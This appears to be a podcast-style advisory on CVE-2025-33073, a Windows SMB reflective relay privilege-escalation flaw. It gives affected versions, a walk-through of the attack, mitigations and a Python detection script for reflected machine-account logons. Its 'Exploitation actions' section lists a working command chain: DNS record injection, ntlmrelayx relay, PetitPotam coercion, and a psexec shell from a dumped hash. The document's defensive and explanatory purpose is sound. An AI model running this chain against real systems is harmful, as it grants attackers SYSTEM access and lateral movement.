Windows SMB client: Improper access control in Windows SMB allowing privilege escalation via Reflective Kerberos Relay (CVE-2025-33073) #shorts
Summary
Hello and welcome to this podcast. Today we're talking about CVE-2025-33073, a privilege-escalation vulnerability in Windows Server Message Block (SMB) rated CVSS 8.8 (Important). Microsoft published it on June 10, 2025 as part of that month's security updates. An attacker who already holds an ordinary domain account and has network access can coerce a target host into authenticating with its own machine account and then reflect that authentication straight back at the host, ending up with SYSTEM-level access on it. We'll break down what the bug is, which products are affected, how the attack works, and how you can protect your systems.
Product details
CVE-2025-33073 affects a broad range of Windows operating systems and install options. All supported builds of Windows 10 (Version 1507 through 22H2), Windows 11 (22H2, 23H2 and 24H2), Windows Server 2008 SP2 (including Server Core), Server 2008 R2 SP1, Server 2012 and 2012 R2, Server 2016, Server 2019 (including Server Core), Server 2022, Windows Server version 23H2 (Server Core), and Windows Server 2025 (including its Core installation) are impacted if they have not received the June 2025 security update.
Vulnerability type summary
This vulnerability is classed as improper access control (CWE-284) in the Windows SMB client. Windows has long shipped protections against authentication reflection, that is, relaying a host's own credentials back to that same host; CVE-2025-33073 is a bypass of those protections. By making a victim connect to a specially crafted server name, an attacker can make the victim authenticate to the attacker's server with the victim's own machine account, and then relay that authentication (Kerberos or NTLM) back to the victim's own SMB server. No elevated ticket is issued anywhere: the victim simply honours its own machine account, which on the local host is SYSTEM-equivalent.
Details of the vulnerability
Here's how it works, following the public analyses from RedTeam Pentesting and Synacktiv: 1. The attacker needs only a low-privilege domain account and a machine on the network. Because authenticated users can add records to Active Directory-integrated DNS by default, the attacker registers an A record that points a specially crafted hostname (it begins with "localhost" and carries a marshalled target-information blob) at the attacker's own IP address. 2. The attacker coerces the victim into connecting to a share on that crafted name with a standard authentication-coercion primitive (PetitPotam, PrinterBug and the like); no action by any user on the victim is required. 3. The victim's SMB client resolves the crafted name as if it referred to the victim itself, so it authenticates with its own machine account: with Kerberos it requests a service ticket for its own SMB service and sends the resulting AP-REQ to the attacker's server, and in the NTLM case the usual reflection check fails to recognise the name as local. 4. The attacker relays that authentication unchanged to the victim's SMB server. Since the identity is the victim's own machine account, the session is granted local administrator (SYSTEM-equivalent) access. The attack can be launched from any compromised host inside the network, and it only works against targets that do not require SMB signing, because a signed session cannot be relayed.
Conclusion
CVE-2025-33073 is a powerful primitive for lateral movement and privilege escalation in Windows environments. To mitigate the risk: • Apply Microsoft's June 2025 cumulative updates on all affected systems. • Require SMB signing on the server side ("Microsoft network server: Digitally sign communications (always)"); a host that enforces signing cannot be exploited this way even before it is patched, and Windows Server 2025 and Windows 11 24H2 already enforce it by default. • Restrict SMB exposure to untrusted networks and enable SMB encryption where possible. • Monitor for a host's own machine account logging on to that host over the network (event 4624, logon type 3) from a non-loopback address, which is the trace both the Kerberos and the NTLM variant leave. • Follow the principle of least privilege and rotate service account credentials. That wraps up our deep-dive on CVE-2025-33073. Stay patched, stay vigilant, and thanks for listening.
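The monitoring point above can be turned into a concrete rule. The following script is an added example, not code from the podcast or from the researchers: it reads a constructed pipe-delimited export of the fields a Windows Security 4624 event carries (EventID, Computer, TargetUserName, TargetDomainName, LogonType, AuthenticationPackageName, IpAddress, WorkstationName; the export format itself is an assumption, the field names are the real ones) and flags any network logon in which a host's own machine account arrives at that host from a non-loopback address. It deliberately covers both the Kerberos and the NTLM variant, since the reflected identity is the same in both cases.

```python
"""Flag Windows Security-log 4624 events that look like a reflected
machine-account logon, the footprint CVE-2025-33073 leaves on the victim.

Input is a constructed pipe-delimited export of the 4624 fields
EventID|Computer|TargetUserName|TargetDomainName|LogonType|
AuthenticationPackageName|IpAddress|WorkstationName (assumed format)."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class LogonEvent:
    event_id: int
    computer: str        # host that recorded the event, usually an FQDN
    target_user: str     # TargetUserName; machine accounts end in "$"
    target_domain: str
    logon_type: int      # 3 = network logon (SMB, RPC, ...)
    auth_package: str    # "Kerberos" or "NTLM"
    source_ip: str       # IpAddress of the client that authenticated
    workstation: str     # WorkstationName as reported by the client


def parse_event(line: str) -> Optional[LogonEvent]:
    """Parse one pipe-delimited record; return None for malformed lines."""
    parts = line.strip().split("|")
    if len(parts) != 8:
        return None
    try:
        return LogonEvent(int(parts[0]), parts[1], parts[2], parts[3],
                          int(parts[4]), parts[5], parts[6], parts[7])
    except ValueError:
        return None


def is_reflected_machine_logon(ev: LogonEvent) -> bool:
    """True when a host's own machine account performed a *network* logon
    to that host from a non-loopback address.

    A healthy host never has its own machine credential presented to it
    over the wire; in the CVE-2025-33073 chain the attacker's relay box
    does exactly that, so the source address is the relay host rather
    than 127.0.0.1 or ::1.  Kerberos and NTLM leave the same trace, so
    the authentication package is not part of the rule.
    """
    if ev.event_id != 4624 or ev.logon_type != 3:
        return False
    if not ev.target_user.endswith("$"):
        return False
    host_short = ev.computer.split(".")[0].upper()
    if ev.target_user[:-1].upper() != host_short:
        return False                       # some other machine's account
    try:
        src = ip_address(ev.source_ip)
    except ValueError:
        return False                       # "-" or garbage: cannot judge
    return not src.is_loopback


def find_reflection_candidates(lines: Iterable[str]) -> List[LogonEvent]:
    """Return every record in `lines` that matches the reflection rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is not None and is_reflected_machine_logon(ev):
            hits.append(ev)
    return hits


# Constructed sample export (not real telemetry). Only the first two
# records should fire: WS01's own account arriving at WS01 over the
# network from 10.0.0.50, once via Kerberos and once via NTLM.
SAMPLE_EVENTS = [
    "4624|ws01.corp.local|WS01$|CORP|3|Kerberos|10.0.0.50|-",
    "4624|ws01.corp.local|WS01$|CORP|3|NTLM|10.0.0.50|RELAYBOX",
    "4624|ws01.corp.local|WS01$|CORP|3|Kerberos|127.0.0.1|WS01",  # loopback, benign
    "4624|ws01.corp.local|alice|CORP|3|Kerberos|10.0.0.7|WS02",   # a user, not a machine
    "4624|ws01.corp.local|FS01$|CORP|3|Kerberos|10.0.0.20|FS01",  # another host's account
    "4624|ws01.corp.local|WS01$|CORP|5|-|-|-",                    # service logon, not network
    "4625|ws01.corp.local|WS01$|CORP|3|NTLM|10.0.0.50|RELAYBOX",  # failed logon, other event
]

if __name__ == "__main__":
    for ev in find_reflection_candidates(SAMPLE_EVENTS):
        print(f"reflection candidate on {ev.computer}: {ev.target_user} via "
              f"{ev.auth_package} from {ev.source_ip}")
```

Run against a real export the rule needs one tuning decision: hosts that are reached through a load balancer or a NAT boundary may legitimately see their own account arrive from a routable address, so the candidate list should be joined with the coercion side (an outbound SMB connection to an unfamiliar DNS name a few seconds earlier) before it is treated as an alert.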
Remediation and exploitation details
This chain involves the following actors
- Attacker: any authenticated domain user with network access to the victim
- Security Administrator: responsible for patching and for enforcing SMB signing
The following systems are involved
- Windows SMB Client on the victim (file and printer sharing): initiates the coerced SMB authentication using the victim's own machine account
- Active Directory-integrated DNS: lets the attacker register the crafted hostname (authenticated users may add records by default)
- Relay tooling (ntlmrelayx, krbrelayx or equivalent): receives the victim's authentication and replays it to the victim's SMB server
- Domain Controller: issues the Kerberos service ticket the victim requests for its own SMB service
Attack entry point
- Malicious SMB Server: attacker-controlled listener, reached through the crafted DNS name, that captures the victim's authentication
Remediation actions
- Install the June 2025 cumulative update on every affected system
- Require SMB signing on the server side; a host that enforces signing cannot have sessions relayed to it, patched or not
- Alert on a host's own machine account logging on to that host over the network (event 4624, logon type 3) from a non-loopback address
Exploitation actions (public tooling; attacker-chosen values are in angle brackets, and the crafted hostname itself is produced as described in the research write-ups under Related Content; stock ntlmrelayx covers the NTLM-reflection variant, while the Kerberos variant needs a Kerberos-aware relay such as krbrelayx with the modifications the researchers describe)
Register a DNS A record for the crafted hostname pointing at the attacker's relay host (dnstool.py from krbrelayx)
- python3 dnstool.py -u 'CORP\lowpriv' -p '<password>' -r '<crafted-hostname>' -d <attacker-ip> --action add <dc-fqdn>
Start a relay listener on port 445 whose only target is the victim's own SMB service
- python3 ntlmrelayx.py -t smb://<victim-fqdn> -smb2support
Coerce the victim into connecting to the crafted name, which resolves to the relay host
- python3 PetitPotam.py -u lowpriv -p '<password>' -d CORP <crafted-hostname> <victim-fqdn>
The victim authenticates to the relay with its own machine account, the relay forwards that authentication back to the victim, and the victim accepts it as a local-administrator session; ntlmrelayx's default action then dumps the local SAM
Use a dumped local administrator hash to open a SYSTEM shell and move laterally
- python3 psexec.py -hashes ':<nt-hash>' Administrator@<victim-fqdn>
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073
- [2025-06-11] An in-depth analysis of the NTLM reflection vulnerability CVE-2025-33073.
- [2025-06-12] A new Windows SMB vulnerability, CVE-2025-33073, allows privilege escalation via a Reflective Kerberos Relay Attack.
- [2025-06-11] An article discussing the CVE-2025-33073 Kerberos Relay Attack and its implications.
- [2025-06-11] A new zero-day vulnerability in Windows SMB Client allows attackers to gain SYSTEM privileges.